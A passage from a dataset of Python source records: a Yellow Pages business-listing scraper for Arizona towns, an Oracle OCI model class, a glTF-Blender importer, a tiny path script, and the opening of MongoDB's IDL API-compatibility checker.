Schools','State Government Offices','Stationaries','Stationary Stores','Stations','Steel Wires & Ropes Manufacturers','Stem Cell Banking','Stock Brokers','Studios','Study Hall Centre','Sub-Registrar Offices','Suitings & Shirtings','Suits And Blazers','Sulphuric Acid Dealers','Sunglasses','Super Specialty Hospitals','Supermarkets','Surgical Instruments','Sweet Shops','Swimming Pools','Table Accessories','Tailoring Materials','Tailors','Tailors & Designers','Take Away Restaurants','Tattoo Makers','Telecommunications','Television Installation','Televisions','Temples','Tent Houses','Textiles','Theaters','Theme Parks','Thermocol Dealers','Ticketing','Tiles','Timber Depot','Tmt Iron & Steel Bars','Tours And Travels','Toy Shops','Trading Consultants','Training Institutes','Transportation','Travel Agencies','Travel Goods','Travel Services','Trophy & Momento Dealers','Trousers','T-Shirts','Tuitions','Tv Accessories','TV Studio','Two Wheelers Dealers','Two Wheelers Service Centres','Typing Institutes','Tyre Dealers','Unani Treatment','Underground Stations','Uniforms','Unitarian Universalist Churches','United Churches Of Christ','Unity Churches','Universities','UPS','UPSC & IAS Coaching Centres','Used Auto Dealers','Used Bike Dealers','Used Cars Dealers','Utensils','UV Water Purifier','Valve Dealer','Vegetables','Vehicle Glass Dealers','Vehicle On Hire','Vending Machine Manufacturer','Veterinary Hospitals','Veterinary Medicines','Video Editing Studios','Video Gaming Centres','Videographers','Vineyard Churches','Vinyl Flooring','Vocational Colleges','Wall Papers','Washing Machine Repair','Washing Machines','Water Cooler Suppliers','Water Parks','Water Purifier Dealers','Water Purifier Repairs','Water Softeners','Water Suppliers','Water Tank Suppliers','Waterproofing','Waterproofing Materials','Weather Stations','Web Designing Companies','Web Hosting Companies','Wedding & Events','Wedding Bands','Wedding Cards','Wedding Catering Services','Wedding Decorations','Wedding Planners','Weight Loss & Gain Centres','Welding Equipment','Welfare Offices','Wesleyan Churches','Wet Grinder Dealers','Wine Shops','Winter Wear','Wire Mesh Dealers','Womens Hostels','Wooden Flooring','Wrist Watch Repairs and Services','Wrist Watches','Xerox Shops','Yoga Centres','Zoo Parks','Zumba Fitness']\n\ncities = ['Ajo','Ak-Chin Village','Amado','Apache Junction','Arizona City','Arizona Village','Ash Fork','Avondale','Avra Valley','Bagdad','Benson','Big Park','Bisbee','Bitter Springs','Black Canyon City','Blackwater','Bluewater','Bouse','Buckeye','Bullhead City','Burnside','Cameron','Camp Verde','Canyon Day','Carefree','Casa Grande','Casas Adobes','Catalina','Catalina Foothills','Cave Creek','Central Heights-Midland City','Chandler','Chilchinbito','Chinle','Chino Valley','Chuichu','Cibecue','Cibola','Clarkdale','Claypool','Clifton','Colorado City','Congress','Coolidge','Cordes Lakes','Cornville','Corona de Tucson','Cottonwood','Cottonwood-Verde Village','Dennehotso','Desert Hills','Dewey-Humboldt','Dilkon','Dolan Springs','Douglas','Drexel-Alvernon','Drexel Heights','Dudleyville','Duncan','Eagar','East Fork','East Sahuarita','Ehrenberg','Elgin','El Mirage','Eloy','First Mesa','Flagstaff','Florence','Flowing Wells','Fort Defiance','Fortuna Foothills','Fountain Hills','Fredonia','Gadsden','Ganado','Gila Bend','Gilbert','Gisela','Glendale','Globe','Gold Camp','Golden Valley','Goodyear','Grand Canyon Village','Greasewood','Green Valley','Guadalupe','Hayden','Heber-Overgaard','Holbrook','Hotevilla-Bacavi','Houck','Huachuca City','Jeddito','Jerome','Kachina Village','Kaibab','Kaibito','Kayenta','Keams Canyon','Kearny','Kingman','Kykotsmovi Village','Lake Havasu City','Lake Montezuma','Lechee','Leupp','Litchfield Park','Littletown','Lukachukai','McNary','Mammoth','Many Farms','Marana','Maricopa','Mayer','Mesa','Mesquite Creek','Miami','Moenkopi','Mohave Valley','Mojave Ranch Estates','Morenci','Mountainaire','Munds Park','Naco','Nazlini','New Kingman-Butler','New River','Nogales','Oljato-Monument Valley','Oracle','Oro Valley','Page','Paradise Valley','Parker','Parker Strip','Parks','Patagonia','Paulden','Payson','Peach Springs','Peeples Valley','Peoria','Peridot','Phoenix','Picture Rocks','Pima','Pine','Pinetop-Lakeside','Pinon','Pirtleville','Pisinemo','Poston','Prescott','Prescott Valley','Quartzsite','Queen Creek','Queen Valley','Red Mesa','Rio Rico Northeast','Rio Rico Northwest','Rio Rico Southeast','Rio Rico Southwest','Rio Verde','Rock Point','Rough Rock','Round Rock','Sacaton','Safford','Sahuarita','St. David','St. Johns','St. Michaels','Salome','San Carlos','San Luis','San Manuel','Santan','Santa Rosa','Sawmill','Scottsdale','Second Mesa','Sedona','Seligman','Sells','Shongopovi','Shonto','Show Low','Sierra Vista','Sierra Vista Southeast','Snowflake','Somerton','Sonoita','South Tucson','Springerville','Spring Valley','Stanfield','Steamboat','Strawberry','Summit','Sun City','Sun City West','Sun Lakes','Sun Valley','Supai','Superior','Surprise','Swift Trail Junction','Tacna','Tanque Verde','Taylor','Teec Nos Pos','Tempe','Thatcher','Three Points','Tolleson','Tombstone','Tonalea','Tonto Basin','Top-of-the-World','Tortolita','Tsaile','Tubac','Tuba City','Tucson','Tucson Estates','Tumacacori-Carmen','Tusayan','Vail','Valencia West','Wellton','Wenden','Whetstone','Whiteriver','Wickenburg','Wilhoit','Willcox','Williams','Williamson','Willow Valley','Window Rock','Winkelman','Winslow','Winslow West','Yarnell','Young','Youngtown','Yuma']\n\ndef parse_listing(keyword,place):\n\n \"\"\"\n\n\n\n Function to process yellowpage listing page\n\n : param keyword: search query\n\n : param place : place name\n\n\n\n \"\"\"\n\n url = \"https://www.yellowpages.com/search?search_terms={0}&geo_location_terms={1}\".format(keyword,place)\n\n print(\"retrieving \",url)\n\n\n\n headers = {'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\n\n 'Accept-Encoding':'gzip, deflate, br',\n\n 'Accept-Language':'en-GB,en;q=0.9,en-US;q=0.8,ml;q=0.7',\n\n 'Cache-Control':'max-age=0',\n\n 'Connection':'keep-alive',\n\n 'Host':'www.yellowpages.com',\n\n 'Upgrade-Insecure-Requests':'1',\n\n 'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36'\n\n }\n\n # Adding retries\n\n for retry in range(10):\n\n try:\n\n response = requests.get(url,verify=True, headers = headers )\n\n print(\"parsing page\")\n\n if response.status_code==200:\n\n parser = html.fromstring(response.text)\n\n #making links absolute\n\n base_url = \"https://www.yellowpages.com\"\n\n parser.make_links_absolute(base_url)\n\n\n\n XPATH_LISTINGS = \"//div[@class='search-results organic']//div[@class='v-card']\"\n\n listings = parser.xpath(XPATH_LISTINGS)\n\n scraped_results = []\n\n\n\n for results in listings:\n\n XPATH_BUSINESS_NAME = \".//a[@class='business-name']//text()\"\n\n\n\n XPATH_WEBSITE = \".//div[@class='info']//div[contains(@class,'info-section')]//div[@class='links']//a[contains(@class,'website')]/@href\"\n\n\n\n raw_business_name = results.xpath(XPATH_BUSINESS_NAME)\n\n\n\n raw_website = results.xpath(XPATH_WEBSITE)\n\n\n\n\n\n business_name = ''.join(raw_business_name).strip() if raw_business_name else None\n\n\n\n website = ''.join(raw_website).strip() if raw_website else None\n\n\n business_details = {\n\n 'business_name':business_name,\n\n\n\n 'website':website,\n\n 'industry':keyword,\n\n 'city': city,\n\n 'state': 'AZ'\n\n\n }\n if(website != '' and website != None):\n scraped_results.append(business_details)\n\n\n\n #print(scraped_results)\n\n return scraped_results\n\n\n\n elif response.status_code==404:\n\n print(\"Could not find a location matching\",place)\n\n #no need to retry for non existing page\n\n return []\n\n else:\n\n print(\"Failed to process page\")\n\n return []\n\n\n\n except:\n\n print(\"Failed to process page\")\n\n return []\n\n\n\n\n\ndef runtime(word, place):\n\n keyword = word\n\n place = place\n\n scraped_data = parse_listing(keyword,place)\n\n if(scraped_data):\n return scraped_data\n\n else:\n return []\n\n\nif __name__==\"__main__\":\n\n\n\n for city in cities:\n final_list = []\n for elem in categories:\n\n final_list.append(runtime(elem, city + ',' + state))\n\n print('STARTING FILE WRITE')\n\n print(\"Writing scraped data to %s-%s-yellowpages-scraped-links.csv\"%(city, state))\n\n\n with open('%s-%s-yellowpages-scraped-links.csv'%(city,state),'ab') as csvfile:\n fieldnames = ['business_name', 'website', 'industry', 'city', 'state']\n\n writer = csv.DictWriter(csvfile, fieldnames = fieldnames, quoting=csv.QUOTE_ALL)\n\n writer.writeheader()\n\n for data in final_list:\n for keys in data:\n writer.writerow(keys)\n\n\n\n\n\n print('DONE. Kendall is Awesome.')\n"} {"ext": "py", "sha": "1a30f161892ee8ec35435409b368ed30822db5e1", "content": "# coding: utf-8\n# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.\n# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.\n\n\nfrom oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401\nfrom oci.decorators import init_model_state_from_kwargs\n\n\n@init_model_state_from_kwargs\nclass AvailableRegionSummary(object):\n \"\"\"\n The summary of region availability for a subscription.\n \"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"\n Initializes a new AvailableRegionSummary object with values from keyword arguments.\n The following keyword arguments are supported (corresponding to the getters/setters of this class):\n\n :param region_name:\n The value to assign to the region_name property of this AvailableRegionSummary.\n :type region_name: str\n\n \"\"\"\n self.swagger_types = {\n 'region_name': 'str'\n }\n\n self.attribute_map = {\n 'region_name': 'regionName'\n }\n\n self._region_name = None\n\n @property\n def region_name(self):\n \"\"\"\n **[Required]** Gets the region_name of this AvailableRegionSummary.\n Region availability for the subscription.\n\n\n :return: The region_name of this AvailableRegionSummary.\n :rtype: str\n \"\"\"\n return self._region_name\n\n @region_name.setter\n def region_name(self, region_name):\n \"\"\"\n Sets the region_name of this AvailableRegionSummary.\n Region availability for the subscription.\n\n\n :param region_name: The region_name of this AvailableRegionSummary.\n :type: str\n \"\"\"\n self._region_name = region_name\n\n def __repr__(self):\n return formatted_flat_dict(self)\n\n def __eq__(self, other):\n if other is None:\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n return not self == other\n"} {"ext": "py", "sha": "1a30f2427bb8864840fc93ce3c057964da01f0a0", "content": "# Copyright 2009 the Melange authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Package containing tests for Melange GHOP module.\n\"\"\"\n"} {"ext": "py", "sha": "1a30f2586e14f93b93da054d4543528d1063ac2c", "content": "# Copyright 2018-2019 The glTF-Blender-IO authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom ..com.gltf2_io import gltf_from_dict\nfrom ..com.gltf2_io_debug import Log\nimport logging\nimport json\nimport struct\nimport base64\nfrom os.path import dirname, join, isfile, basename\nfrom urllib.parse import unquote\n\n\nclass glTFImporter():\n \"\"\"glTF Importer class.\"\"\"\n\n def __init__(self, filename, import_settings):\n \"\"\"initialization.\"\"\"\n self.filename = filename\n self.import_settings = import_settings\n self.glb_buffer = None\n self.buffers = {}\n self.accessor_cache = {}\n\n if 'loglevel' not in self.import_settings.keys():\n self.import_settings['loglevel'] = logging.ERROR\n\n log = Log(import_settings['loglevel'])\n self.log = log.logger\n self.log_handler = log.hdlr\n\n self.SIMPLE = 1\n self.TEXTURE = 2\n self.TEXTURE_FACTOR = 3\n\n # TODO: move to a com place?\n self.extensions_managed = [\n 'KHR_materials_pbrSpecularGlossiness',\n 'KHR_lights_punctual',\n 'KHR_materials_unlit',\n 'KHR_texture_transform'\n ]\n\n # TODO : merge with io_constants\n self.fmt_char_dict = {}\n self.fmt_char_dict[5120] = 'b' # Byte\n self.fmt_char_dict[5121] = 'B' # Unsigned Byte\n self.fmt_char_dict[5122] = 'h' # Short\n self.fmt_char_dict[5123] = 'H' # Unsigned Short\n self.fmt_char_dict[5125] = 'I' # Unsigned Int\n self.fmt_char_dict[5126] = 'f' # Float\n\n self.component_nb_dict = {}\n self.component_nb_dict['SCALAR'] = 1\n self.component_nb_dict['VEC2'] = 2\n self.component_nb_dict['VEC3'] = 3\n self.component_nb_dict['VEC4'] = 4\n self.component_nb_dict['MAT2'] = 4\n self.component_nb_dict['MAT3'] = 9\n self.component_nb_dict['MAT4'] = 16\n\n @staticmethod\n def bad_json_value(val):\n \"\"\"Bad Json value.\"\"\"\n raise ValueError('Json contains some unauthorized values')\n\n def checks(self):\n \"\"\"Some checks.\"\"\"\n if self.data.asset.version != \"2.0\":\n return False, \"glTF version must be 2\"\n\n if self.data.extensions_required is not None:\n for extension in self.data.extensions_required:\n if extension not in self.data.extensions_used:\n return False, \"Extension required must be in Extension Used too\"\n if extension not in self.extensions_managed:\n return False, \"Extension \" + extension + \" is not available on this addon version\"\n\n if self.data.extensions_used is not None:\n for extension in self.data.extensions_used:\n if extension not in self.extensions_managed:\n # Non blocking error #TODO log\n pass\n\n return True, None\n\n def load_glb(self):\n \"\"\"Load binary glb.\"\"\"\n header = struct.unpack_from('<4sII', self.content)\n self.format = header[0]\n self.version = header[1]\n self.file_size = header[2]\n\n if self.format != b'glTF':\n return False, \"This file is not a glTF/glb file\"\n\n if self.version != 2:\n return False, \"GLB version %d unsupported\" % self.version\n\n if self.file_size != len(self.content):\n return False, \"Bad GLB: file size doesn't match\"\n\n offset = 12 # header size = 12\n\n # JSON chunk is first\n type_, len_, json_bytes, offset = self.load_chunk(offset)\n if type_ != b\"JSON\":\n return False, \"Bad GLB: first chunk not JSON\"\n if len_ != len(json_bytes):\n return False, \"Bad GLB: length of json chunk doesn't match\"\n try:\n json_str = str(json_bytes, encoding='utf-8')\n json_ = json.loads(json_str, parse_constant=glTFImporter.bad_json_value)\n self.data = gltf_from_dict(json_)\n except ValueError as e:\n return False, e.args[0]\n\n # BIN chunk is second (if it exists)\n if offset < len(self.content):\n type_, len_, data, offset = self.load_chunk(offset)\n if type_ == b\"BIN\\0\":\n if len_ != len(data):\n return False, \"Bad GLB: length of BIN chunk doesn't match\"\n self.glb_buffer = data\n\n return True, None\n\n def load_chunk(self, offset):\n \"\"\"Load chunk.\"\"\"\n chunk_header = struct.unpack_from('<I4s', self.content, offset)\n data_length = chunk_header[0]\n data_type = chunk_header[1]\n data = self.content[offset + 8: offset + 8 + data_length]\n\n return data_type, data_length, data, offset + 8 + data_length\n\n def read(self):\n \"\"\"Read file.\"\"\"\n # Check this is a file\n if not isfile(self.filename):\n return False, \"Please select a file\"\n\n # Check if file is gltf or glb\n with open(self.filename, 'rb') as f:\n self.content = memoryview(f.read())\n\n self.is_glb_format = self.content[:4] == b'glTF'\n\n # glTF file\n if not self.is_glb_format:\n content = str(self.content, encoding='utf-8')\n self.content = None\n try:\n self.data = gltf_from_dict(json.loads(content, parse_constant=glTFImporter.bad_json_value))\n return True, None\n except ValueError as e:\n return False, e.args[0]\n\n # glb file\n else:\n # Parsing glb file\n success, txt = self.load_glb()\n self.content = None\n return success, txt\n\n def is_node_joint(self, node_idx):\n \"\"\"Check if node is a joint.\"\"\"\n if not self.data.skins: # if no skin in gltf file\n return False, None\n\n for skin_idx, skin in enumerate(self.data.skins):\n if node_idx in skin.joints:\n return True, skin_idx\n\n return False, None\n\n def load_buffer(self, buffer_idx):\n \"\"\"Load buffer.\"\"\"\n buffer = self.data.buffers[buffer_idx]\n\n if buffer.uri:\n data, _file_name = self.load_uri(buffer.uri)\n if data is not None:\n self.buffers[buffer_idx] = data\n\n else:\n # GLB-stored buffer\n if buffer_idx == 0 and self.glb_buffer is not None:\n self.buffers[buffer_idx] = self.glb_buffer\n\n def load_uri(self, uri):\n \"\"\"Loads a URI.\n Returns the data and the filename of the resource, if there is one.\n \"\"\"\n sep = ';base64,'\n if uri.startswith('data:'):\n idx = uri.find(sep)\n if idx != -1:\n data = uri[idx + len(sep):]\n return memoryview(base64.b64decode(data)), None\n\n path = join(dirname(self.filename), unquote(uri))\n try:\n with open(path, 'rb') as f_:\n return memoryview(f_.read()), basename(path)\n except Exception:\n self.log.error(\"Couldn't read file: \" + path)\n return None, None\n\n"} {"ext": "py", "sha": "1a30f28c186d1cd68412be7a4f52b0844039bfa1", "content": "from sys import path\n\npath.append('/home/joerojas/Desarrollo/Curso-Basico-Python/102_misPaquetes/packages')\n\nimport extra.iota\n\nprint(extra.iota.FunI())"} {"ext": "py", "sha": "1a30f29428a6eeb9c34a6ecedb3de29fa9f068db", "content": "# Copyright (C) 2021-present MongoDB, Inc.\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the Server Side Public License, version 1,\n# as published by MongoDB, Inc.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# Server Side Public License for more details.\n#\n# You should have received a copy of the Server Side Public License\n# along with this program. If not, see\n# <http://www.mongodb.com/licensing/server-side-public-license>.\n#\n# As a special exception, the copyright holders give permission to link the\n# code of portions of this program with the OpenSSL library under certain\n# conditions as described in each individual source file and distribute\n# linked combinations including the program with the OpenSSL library. You\n# must comply with the Server Side Public License in all respects for\n# all of the code used other than as permitted herein. If you modify file(s)\n# with this exception, you may extend this exception to your version of the\n# file(s), but you are not obligated to do so. If you do not wish to do so,\n# delete this exception statement from your version. If you delete this\n# exception statement from all source files in the program, then also delete\n# it in the license file.\n#\n# pylint: disable=too-many-lines\n\"\"\"Checks compatibility of old and new IDL files.\n\nIn order to support user-selectable API versions for the server, server commands are now\ndefined using IDL files. This script checks that old and new commands are compatible with each\nother, which allows commands to be updated without breaking the API specifications within a\nspecific API version.\n\nThis script accepts two directories as arguments, the \"old\" and the \"new\" IDL directory.\nBefore running this script, run checkout_idl_files_from_past_releases.py to find and create\ndirectories containing the old IDL files from previous releases.\n\"\"\"\n\nimport argparse\nimport os\nimport sys\nfrom dataclasses import dataclass\nfrom enum import Enum\nfrom typing import Dict, List, Set, Optional, Tuple, Union\n\nfrom idl import parser, syntax, errors, common\nfrom idl.compiler import CompilerImportResolver\nfrom idl_compatibility_errors import IDLCompatibilityContext, IDLCompatibilityErrorCollection\n\nALLOW_ANY_TYPE_LIST: List[str] = [\n # This list if only used in unit-tests.\n \"commandAllowedAnyTypes\",\n \"commandAllowedAnyTypes-param-anyTypeParam\",\n \"commandAllowedAnyTypes-reply-anyTypeField\",\n \"oldTypeBsonAnyAllowList\",\n \"newTypeBsonAnyAllowList\",\n \"oldReplyFieldTypeBsonAnyAllowList-reply-oldBsonSerializationTypeAnyReplyField\",\n \"newReplyFieldTypeBsonAnyAllowList-reply-newBsonSerializationTypeAnyReplyField\",\n \"oldParamTypeBsonAnyAllowList-param-bsonTypeAnyParam\",\n \"newParamTypeBsonAnyAllowList-param-bsonTypeAnyParam\",\n \"commandAllowedAnyTypesWithVariant-reply-anyTypeField\",\n \"replyFieldTypeBsonAnyWithVariant-reply-bsonSerializationTypeAnyStructField\",\n \"replyFieldTypeBsonAnyWithVariantWithArray-reply-bsonSerializationTypeAnyStructField\",\n \"parameterFieldTypeBsonAnyWithVariant-param-bsonSerializationTypeAnyStructField\",\n \"parameterFieldTypeBsonAnyWithVariantWithArray-param-bsonSerializationTypeAnyStructField\",\n \"commandTypeBsonAnyWithVariant\",\n \"commandTypeBsonAnyWithVariantWithArray\",\n \"replyFieldCppTypeNotEqual-reply-cppTypeNotEqualReplyField\",\n \"commandCppTypeNotEqual\",\n \"commandParameterCppTypeNotEqual-param-cppTypeNotEqualParam\",\n \"replyFieldSerializerNotEqual-reply-serializerNotEqualReplyField\",\n \"commandSerializerNotEqual\",\n \"commandParameterSerializerNotEqual-param-serializerNotEqualParam\",\n \"replyFieldDeserializerNotEqual-reply-deserializerNotEqualReplyField\",\n \"commandDeserializerNotEqual\",\n \"commandParameterDeserializerNotEqual-param-deserializerNotEqualParam\",\n \"newlyAddedReplyFieldTypeBsonAnyAllowed-reply-newlyAddedBsonSerializationTypeAnyReplyField\",\n \"replyFieldTypeBsonAnyWithVariantUnstable-reply-bsonSerializationTypeWithVariantAnyUnstableReplyField\",\n \"newlyAddedParamBsonAnyAllowList-param-newlyAddedBsonAnyAllowListParam\",\n \"newlyAddedTypeFieldBsonAnyAllowList\",\n \"parameterFieldTypeBsonAnyWithVariantUnstable-param-bsonSerializationTypeAnyStructField\",\n \"commandTypeBsonAnyWithVariantUnstable\",\n \"commandParameterCppTypeNotEqualUnstable-param-cppTypeNotEqualParam\",\n \"replyFieldCppTypeNotEqualUnstable-reply-cppTypeNotEqualReplyUnstableField\",\n \"commandCppTypeNotEqualUnstable\",\n \"commandParameterSerializerNotEqualUnstable-param-serializerNotEqualParam\",\n \"replyFieldSerializerNotEqualUnstable-reply-serializerNotEqualReplyUnstableField\",\n \"commandSerializerNotEqualUnstable\",\n \"commandParameterDeserializerNotEqualUnstable-param-deserializerNotEqualParam\",\n \"replyFieldDeserializerNotEqualUnstable-reply-deserializerNotEqualReplyUnstableField\",\n \"commandDeserializerNotEqualUnstable\",\n 'create-param-backwards',\n 'saslStart-param-payload',\n 'saslStart-param-payload',\n 'saslStart-reply-payload',\n 'saslContinue-param-payload',\n 'saslContinue-reply-payload',\n\n # These commands (aggregate, find, update, delete, findAndModify, explain) might contain some\n # fields with type `any`. Currently, it's not possible to avoid the `any` type in those cases.\n # Instead, here are the preventive measures in-place to catch unintentional breaking changes:\n # 1- Added comments on top of custom serializers/deserializers (related to these fields) to\n # let the future developers know that their modifications to these methods might lead to\n # a breaking change in the API.\n # 2- Added proper unit-tests to catch accidental changes to the custom serializers/deserializers\n # by over-fitting on the current implementation of these custom serializers/deserializers.\n # 3- Added further checks to the current script (idl_check_compatibility.py) to check for\n # changing a custom serializer/deserializer and considering it as a potential breaking\n # change.\n 'aggregate-param-pipeline',\n 'aggregate-param-explain',\n 'aggregate-param-allowDiskUse',\n 'aggregate-param-cursor',\n 'aggregate-param-hint',\n 'aggregate-param-needsMerge',\n 'aggregate-param-fromMongos',\n 'aggregate-param-$_requestReshardingResumeToken',\n 'aggregate-param-isMapReduceCommand',\n 'count-param-hint',\n 'count-param-limit',\n 'count-param-maxTimeMS',\n 'find-param-filter',\n 'find-param-projection',\n 'find-param-sort',\n 'find-param-hint',\n 'find-param-collation',\n 'find-param-singleBatch',\n 'find-param-allowDiskUse',\n 'find-param-min',\n 'find-param-max',\n 'find-param-returnKey',\n 'find-param-showRecordId',\n 'find-param-$queryOptions',\n 'find-param-tailable',\n 'find-param-oplogReplay',\n 'find-param-noCursorTimeout',\n 'find-param-awaitData',\n 'find-param-allowPartialResults',\n 'find-param-readOnce',\n 'find-param-allowSpeculativeMajorityRead',\n 'find-param-$_requestResumeToken',\n 'find-param-$_resumeAfter',\n 'find-param-maxTimeMS',\n 'update-param-u',\n 'update-param-hint',\n 'update-param-upsertSupplied',\n 'update-reply-_id',\n 'delete-param-limit',\n 'delete-param-hint',\n 'findAndModify-param-hint',\n 'findAndModify-param-update',\n 'findAndModify-reply-upserted',\n 'insert-reply-opTime',\n 'update-reply-opTime',\n 'delete-reply-opTime',\n 'aggregate-reply-partialResultsReturned',\n 'aggregate-reply-invalidated',\n 'find-reply-partialResultsReturned',\n 'find-reply-invalidated',\n 'getMore-reply-partialResultsReturned',\n 'getMore-reply-invalidated',\n]\n\n# Do not add user visible fields already released in earlier versions.\nIGNORE_UNSTABLE_LIST: List[str] = [\n # The 'originalSpec' field was introduced in v5.1 behind a disabled feature flag and is not user\n # visible. This is part of the listIndexes output when executed against system.bucket.*\n # collections, which users should avoid doing.\n 'listIndexes-reply-originalSpec',\n # The 'vars' field was introduced to facilitate communication between mongot and mongod and is\n # not user visible.\n 'find-reply-vars',\n 'aggregate-reply-vars',\n # The 'cursor' field is now optional in a reply, as inter-node communication in aggregation\n # can return one or more cursors. Multiple cursors are covered under the 'cursors' field.\n 'find-reply-cursor',\n 'aggregate-reply-cursor',\n # The 'recordPreImages' field is only used by Realm and is not documented to users.\n 'collMod-param-recordPreImages',\n # The 'ignoreUnknownIndexOptions' field is for internal use only and is not documented to users.\n 'createIndexes-param-ignoreUnknownIndexOptions',\n # The 'runtimeConstants' field is a legacy field for internal use only and is not documented to\n # users.\n 'delete-param-runtimeConstants',\n]\n\nSKIPPED_FILES = [\n \"unittest.idl\", \"mozILocalization.idl\", \"mozILocaleService.idl\", \"mozIOSPreferences.idl\",\n \"nsICollation.idl\", \"nsIStringBundle.idl\", \"nsIScriptableUConv.idl\", \"nsITextToSubURI.idl\"\n]\n\n# Do not add commands that were visible to users in previously released versions.\nIGNORE_COMMANDS_LIST: List[str] = [\n # The following commands were released behind a feature flag in 5.3 but were shelved in\n # favor of getClusterParameter and setClusterParameter. Since the feature flag was not enabled\n # in 5.3, they were effectively unusable and so can be safely removed from the strict API.\n 'getChangeStreamOptions',\n 'setChangeStreamOptions',\n]\n\n\nclass FieldCompatibility:\n \"\"\"Information about a Field to check compatibility.\"\"\"\n\n def __init__(self, field_type: Optional[Union[syntax.Enum, syntax.Struct, syntax.Type]],\n idl_file: syntax.IDLParsedSpec, idl_file_path: str, unstable: Optional[bool],\n optional: bool) -> None:\n \"\"\"Initialize data members and hand special cases, such as optionalBool type.\"\"\"\n self.field_type = field_type\n self.idl_file = idl_file\n self.idl_file_path = idl_file_path\n self.unstable = unstable\n self.optional = optional\n\n if isinstance(self.field_type, syntax.Type) and self.field_type.name == \"optionalBool\":\n # special case for optionalBool type, because it is compatible\n # with bool type, but has bson_serialization_type == 'any'\n # which is not supported by many checks\n self.field_type = syntax.Type(field_type.file_name, field_type.line, field_type.column)\n self.field_type.name = \"bool\"\n self.field_type.bson_serialization_type = [\"bool\"]\n self.optional = True\n\n\n@dataclass\nclass FieldCompatibilityPair:\n \"\"\"Information about an old and new Field pair to check compatibility.\"\"\"\n\n old: FieldCompatibility\n new: FieldCompatibility\n cmd_name: str\n field_name: str\n\n\nclass ArrayTypeCheckResult(Enum):\n \"\"\"Enumeration representing different return values of check_array_type.\"\"\"\n\n INVALID = 0\n TRUE = 1\n FALSE = 2\n\n\ndef get_new_commands(\n ctxt: IDLCompatibilityContext, new_idl_dir: str, import_directories: List[str]\n) -> Tuple[Dict[str, syntax.Command], Dict[str, syntax.IDLParsedSpec], Dict[str, str]]:\n \"\"\"Get new IDL commands and check validity.\"\"\"\n new_commands: Dict[str, syntax.Command] = dict()\n new_command_file: Dict[str, syntax.IDLParsedSpec] = dict()\n new_command_file_path: Dict[str, str] = dict()\n\n for dirpath, _, filenames in os.walk(new_idl_dir):\n for new_filename in filenames:\n if not new_filename.endswith('.idl') or new_filename in SKIPPED_FILES:\n continue\n\n new_idl_file_path = os.path.join(dirpath, new_filename)\n with open(new_idl_file_path) as new_file:\n new_idl_file = parser.parse(\n new_file, new_idl_file_path,\n CompilerImportResolver(import_directories + [new_idl_dir]))\n if new_idl_file.errors:\n new_idl_file.errors.dump_errors()\n raise ValueError(f\"Cannot parse {new_idl_file_path}\")\n\n for new_cmd in new_idl_file.spec.symbols.commands:\n # Ignore imported commands as they will be processed in their own file.\n if new_cmd.api_version == \"\" or new_cmd.imported:\n continue\n\n if new_cmd.api_version != \"1\":\n # We're not ready to handle future API versions yet.\n ctxt.add_command_invalid_api_version_error(\n new_cmd.command_name, new_cmd.api_version, new_idl_file_path)\n continue\n\n if new_cmd.command_name in new_commands:\n ctxt.add_duplicate_command_name_error(new_cmd.command_name, new_idl_dir,\n new_idl_file_path)\n continue\n new_commands[new_cmd.command_name] = new_cmd\n\n new_command_file[new_cmd.command_name] = new_idl_file\n new_command_file_path[new_cmd.command_name] = new_idl_file_path\n\n return new_commands, new_command_file, new_command_file_path\n\n\ndef get_chained_type_or_struct(\n chained_type_or_struct: Union[syntax.ChainedType, syntax.ChainedStruct],\n idl_file: syntax.IDLParsedSpec,\n idl_file_path: str) -> Optional[Union[syntax.Enum, syntax.Struct, syntax.Type]]:\n \"\"\"Resolve and get chained type or struct from the IDL file.\"\"\"\n parser_ctxt = errors.ParserContext(idl_file_path, errors.ParserErrorCollection())\n resolved = idl_file.spec.symbols.resolve_type_from_name(parser_ctxt, chained_type_or_struct,\n chained_type_or_struct.name,\n chained_type_or_struct.name)\n if parser_ctxt.errors.has_errors():\n parser_ctxt.errors.dump_errors()\n return resolved\n\n\ndef get_field_type(field: Union[syntax.Field, syntax.Command], idl_file: syntax.IDLParsedSpec,\n idl_file_path: str) -> Optional[Union[syntax.Enum, syntax.Struct, syntax.Type]]:\n \"\"\"Resolve and get field type of a field from the IDL file.\"\"\"\n parser_ctxt = errors.ParserContext(idl_file_path, errors.ParserErrorCollection())\n field_type = idl_file.spec.symbols.resolve_field_type(parser_ctxt, field, field.name,\n field.type)\n if parser_ctxt.errors.has_errors():\n parser_ctxt.errors.dump_errors()\n return field_type\n\n\ndef check_subset(ctxt: IDLCompatibilityContext, cmd_name: str, field_name: str, type_name: str,\n sub_list: List[Union[str, syntax.EnumValue]],\n super_list: List[Union[str, syntax.EnumValue]], file_path: str):\n # pylint: disable=too-many-arguments\n 